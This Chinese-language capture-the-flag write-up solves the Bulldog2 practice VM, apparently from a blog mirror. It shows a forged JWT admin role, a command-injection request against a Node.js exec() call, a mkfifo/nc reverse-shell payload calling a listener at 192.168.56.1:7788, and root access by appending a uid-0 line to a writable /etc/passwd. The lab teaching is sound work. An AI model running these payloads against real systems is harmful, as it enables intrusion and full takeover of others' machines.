zoukankan      html  css  js  c++  java
  • Write-up-Bulldog2

    关于

    信息收集

    • 网卡:vboxnet0,192.168.56.1/24,Nmap扫存活主机发现IP为192.168.56.101
    ➜  ~ nmap -sn 192.168.56.1/24
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-25 20:48 CST
    Nmap scan report for 192.168.56.1
    Host is up (0.00013s latency).
    Nmap scan report for 192.168.56.101
    Host is up (0.00061s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 3.02 seconds
    ➜  ~ 
    ➜  ~ nmap -T4 -A 192.168.56.101
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-25 20:49 CST
    Nmap scan report for 192.168.56.101
    Host is up (0.00041s latency).
    Not shown: 999 filtered ports
    PORT   STATE SERVICE VERSION
    80/tcp open  http    nginx 1.14.0 (Ubuntu)
    |_http-cors: HEAD GET POST PUT DELETE PATCH
    |_http-server-header: nginx/1.14.0 (Ubuntu)
    |_http-title: Bulldog.social
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 13.35 seconds
    
    • 发现只开了80端口,所以只能从Web入手了,浏览器打开看插件可知编程语言是Node-js,整个页面也只加载了几个js和css文件,而且查看网页源码发现只有一行。正常的开发者是不会这么写的,太难看了,格式化一下,页面也没什么特效,加载的js文件有点多啊,问题肯定在js里。
    <!doctype html>
    <html lang="en">
    	<head>
    		<meta charset="utf-8">
    		<title>
    			Bulldog.social
    		</title>
    		<link rel="stylesheet" href="/assets/bootstrap.min.css">
    		<link rel="stylesheet" type="text/css" href="/assets/styles.css">
    		<script src="/assets/particles.min.js">
    		</script>
    		<base href="/">
    		<meta name="viewport" content="width=device-width,initial-scale=1">
    		<link rel="icon" type="image/x-icon" href="favicon.ico">
    		<link href="styles.7decb11e9986af81075e.bundle.css" rel="stylesheet" />
    	</head>
    	<body>
    		<div id="particles-js">
    		</div>
    		<br>
    		<br>
    		<app-root>
    		</app-root>
    		<br>
    		<div style="text-align:center">
    			<a href="/about">
    				About Us |
    			</a>
    			<a href="/">
    				Twitter |
    			</a>
    			<a href="/">
    				Instagram
    			</a>
    		</div>
    		<br>
    		<script type="text/javascript" src="inline.7a6fe116b23fa31a9970.bundle.js">
    		</script>
    		<script type="text/javascript" src="polyfills.f056ccbeb07b92448c13.bundle.js">
    		</script>
    		<script type="text/javascript" src="vendor.0ce9a4a4addea27177ca.bundle.js">
    		</script>
    		<script type="text/javascript" src="main.8b490782e52b9899e2a7.bundle.js">
    		</script>
    	</body>
    
    </html>
    <script>
    	particlesJS.load('particles-js', '/assets/particles/particlesjs-config.json',
    	function() {});
    </script>
    
    • 到处点,发现关闭了注册功能,但在main.8b490782e52b9899e2a7.bundle.js这个文件里找到了注册功能,只要安照json格式发送请求就可以注册成功了。
    l.prototype.onRegisterSubmit = function() {
    	var l = this,
    	n = {
    		name: this.name,
    		email: this.email,
    		username: this.username,
    		password: this.password
    	};
    

    绕过注册

    • 数据包
    POST /users/register HTTP/1.1
    Host: 192.168.56.101
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.56.101/login
    content-type: application/json
    Content-Length: 99
    Connection: close
    
    {
      "name": "kt",
      "email": "root@kali-team.cn",
      "username": "kt",
      "password": "123456"
    }
    
    • 返回用户已经注册,登录试试。
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 24 Oct 2018 08:36:19 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 40
    Connection: close
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    ETag: W/"28-r22PRevV1bosgiTQ0L7/zW61meQ"
    
    {"success":true,"msg":"User registered"}
    

    获取管理员权限

    • 登录后返回一串字符,里面有一个键为auth_level的值翻译过来是标准用户,即不是管理员。发现token有一个JWT,谷歌找到一个解密网站点我
    {"success":true,"token":"JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXlsb2FkIjp7Im5hbWUiOiJrdCIsImVtYWlsIjoicm9vdEBrYWxpLXRlYW0uY24iLCJ1c2VybmFtZSI6Imt0IiwiYXV0aF9sZXZlbCI6InN0YW5kYXJkX3VzZXIifSwiaWF0IjoxNTQwMzcwNTYzLCJleHAiOjE1NDA5NzUzNjN9.miulCBmgpn_NqFHppjlk-zzJsSrdgCvdHZTP395Hbjg","user":{"name":"kt","username":"kt","email":"root@kali-team.cn","auth_level":"standard_user"}}
    
    • 然后解密得到下面内容,就是我注册时的信息啊,通过搜索js里的auth_level找到判断是否是管理员权限的地方找到了master_admin_user,想着是不是把standard_usermaster_admin_user就能拿到管理员权限了。
    {
      "payload": {
        "name": "kt",
        "email": "root@kali-team.cn",
        "username": "kt",
        "auth_level": "standard_user"
      },
      "iat": 1540370563,
      "exp": 1540975363
    }
    
    l.prototype.isAdmin = function() {
    var l = localStorage.getItem("user");
    return null !== l && "master_admin_user" == JSON.parse(l).auth_level
    },
    
    • 然后在解密平台上把auth_level的值改为master_admin_user再把加密后的token替换原来的 ,明文的也一起改了,再放行数据,在浏览器这边已经方形用户成为管理员权限了。

    漏洞利用

    • 打开管理员的控制面板看到CLI Tool,第一眼看上去是不是想到命令行工具。Nodejs执行命令一般都会用exec创建子进程执行,找到routes/users.js文件有一段可能存在命令执行漏洞的代码。
    router.post('/linkauthenticate', (req, res, next) => {
      const username = req.body.password;
      const password = req.body.password;
    
      exec(`linkplus -u ${username} -p ${password}`, (error, stdout, stderr) => {
      if (error) {
        console.error(`exec error: ${error}`);
        return;
      }
      console.log(`stdout: ${stdout}`);
      console.log(`stderr: ${stderr}`);
    });
    
    • 当请求改密码时会执行linkplus -u ${username} -p ${password}我们在后面跟着想执行的命令就可以了,因为没有回显,所以也不知道命令有没有执行成功,你们可以用DNSlog测试,我在这就ping我自己的电脑,抓包证明一下就好了,可以看出是命令执行成功了的。
    POST /users/linkauthenticate HTTP/1.1
    Host: 192.168.56.101
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.56.101/dashboard
    content-type: application/json
    Content-Length: 73
    Connection: close
    
    {
      "username": "kt",
      "password": "1234566  ; ping 192.168.56.1 -c 4"
    }
    
    11	0.005424306	192.168.56.101	192.168.56.1	ICMP	98	Echo (ping) request  id=0x61fd, seq=1/256, ttl=64 (reply in 12)
    12	0.005440583	192.168.56.1	192.168.56.101	ICMP	98	Echo (ping) reply    id=0x61fd, seq=1/256, ttl=64 (request in 11)
    

    反弹Shell

    • 因为json请求里有了引号,所以很多反弹的方法都不管用了,但找到了一种没有引号的
    POST /users/linkauthenticate HTTP/1.1
    Host: 192.168.56.101
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.56.101/dashboard
    content-type: application/json
    Content-Length: 123
    Connection: close
    
    {
      "username": "kt",
      "password": "1  ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 7788 >/tmp/f"
    }
    
    • NC已经返回shell了
    ➜  ~ nc -lvp 7788
    Connection from 192.168.56.101:37834
    /bin/sh: 0: can't access tty; job control turned off
    $ id
    uid=1001(node) gid=1005(node) groups=1005(node)
    $ 
    

    提权

    • find / -writable -type f 2>/dev/null | grep -v "/proc/"找出所有可写的root用户的文件,发现/etc/passwd文件可写。

    • 生成密码

    ➜  ~ openssl passwd -1 -salt kt 123
    $1$kt$mR/jSFSDV/G0vNQ72T8cs.
    
    • 添加用户$ echo "kt:$1$kt$mR/jSFSDV/G0vNQ72T8cs.:0:0:root:/root:/bin/bash" >> passwd
    node@bulldog2:/etc$ su kt
    su kt
    Password: 123
    root@bulldog2:/etc# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@bulldog2:/etc# 
    root@bulldog2:/etc# cd /root
    cd /root
    root@bulldog2:~# ls
    ls
    flag.txt
    root@bulldog2:~# cat flag.txt
    cat flag.txt
    Congratulations on completing this VM :D That wasn't so bad was it?
    
    Let me know what you thought on twitter, I'm @frichette_n
    
    I'm already working on another more challenging VM. Follow me for updates.
    root@bulldog2:~# 
    
    
    • Flag到手!
  • 相关阅读:
    Grand Central Dispatch-thread pool pattern
    POSIX Threads
    Event-driven programming-main loop
    Data type-数据类型
    软件的动与静
    对封装好的视图进行动态修改
    编程语言进化
    Type system
    Run-time type information--RTTI
    Type system-Type checking
  • 原文地址:https://www.cnblogs.com/Kali-Team/p/12210985.html
Copyright © 2011-2022 走看看